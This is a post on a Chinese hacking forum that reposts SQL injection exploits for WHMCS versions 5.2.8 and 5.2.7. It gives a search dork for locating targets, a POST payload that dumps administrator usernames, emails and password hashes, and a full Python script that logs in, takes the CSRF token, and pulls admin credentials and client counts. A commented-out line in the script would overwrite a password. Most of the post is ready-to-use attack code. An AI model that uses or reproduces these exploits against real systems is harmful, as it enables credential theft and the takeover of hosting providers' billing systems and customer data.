查看: 19410|回复: 1

WHMCS 5.2.8 – SQL Injection Vulnerability

[复制链接]
  • TA的每日心情
    开心
    2017-1-9 18:10
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-2-11 11:28:57 | 显示全部楼层 |阅读模式
    本帖最后由 Diana 于 2014-2-11 11:42 编辑

    # Google Dork: "powered by WHMCS"
    # Exploit Author: g00n ( Xploiter.net )
    # Vendor Homepage: http://www.whmcs.com/
    # Software Link: http://www.whmcs.com/
    # Version: 5.2.8
    # Tested on: Windows, Linux

    Vulnerable file: /includes/dbfunctions.php

    POC:

    select_query() function is vulnerable due to Register Globals

    Example:

    /whmcs/viewticket.php
    [AppleScript] 纯文本查看 复制代码
    POST: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#
    


    ----------------------------------------------------------------上面和下面版本不一样

    WHMCS 5.2.7 – SQL Injection Vulnerability

    漏洞文件 /includes/dbfunctions.php:
    [AppleScript] 纯文本查看 复制代码
    <?php
    function update_query($table, $array, $where) {
        #[...]
        if (substr($value, 0, 11) == 'AES_ENCRYPT') {
            $query .= $value.',';
            continue;
        }
        #[...]
        $result = mysql_query($query, $whmcsmysql);
     }
    ?>

    EXP:
    [AppleScript] 纯文本查看 复制代码
    #!/usr/bin/env python
    # 2013/10/03 - WHMCS 5.2.7 SQL Injection
    # [url]http://localhost.re/p/whmcs-527-vulnerability[/url]
      
    url = 'http://clients.target.com/' # wopsie dopsie
    user_email = 'mysuper@hacker.account' # just create a dummie account at /register.php
    user_pwd = 'hacker'
      
    import urllib, re, sys
    from urllib2 import Request, urlopen
    ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
      
    def exploit(sql):
        print "Doing stuff: %s" % sql
        r = urlopen(Request('%sclientarea.php?action=details' % url, data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua, "Cookie": user[0]})).read()
        return re.search(r'(id="firstname" value="(.*?)")', r).group(2)
      
    def login():
        print "Getting CSRF token"
        r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
        csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r.read()).group(2)
        cookie = r.info()['set-cookie'].split(';')[0]
        print "Logging in"
        r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email, user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read()
        if 'dologin.php' in r:
            sys.exit('Unable to login')
        else:
            return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r).group(2)]
      
    user = login()
    print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get admins
    print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients
      
    # oh you want to be evil
    #exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as x)#" % user_email)

    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-8-10 19:40
  • 签到天数: 33 天

    [LV.5]常住居民I

    发表于 2014-2-13 17:02:51 | 显示全部楼层
    sf...沙发
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-27 21:31 , Processed in 0.024047 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部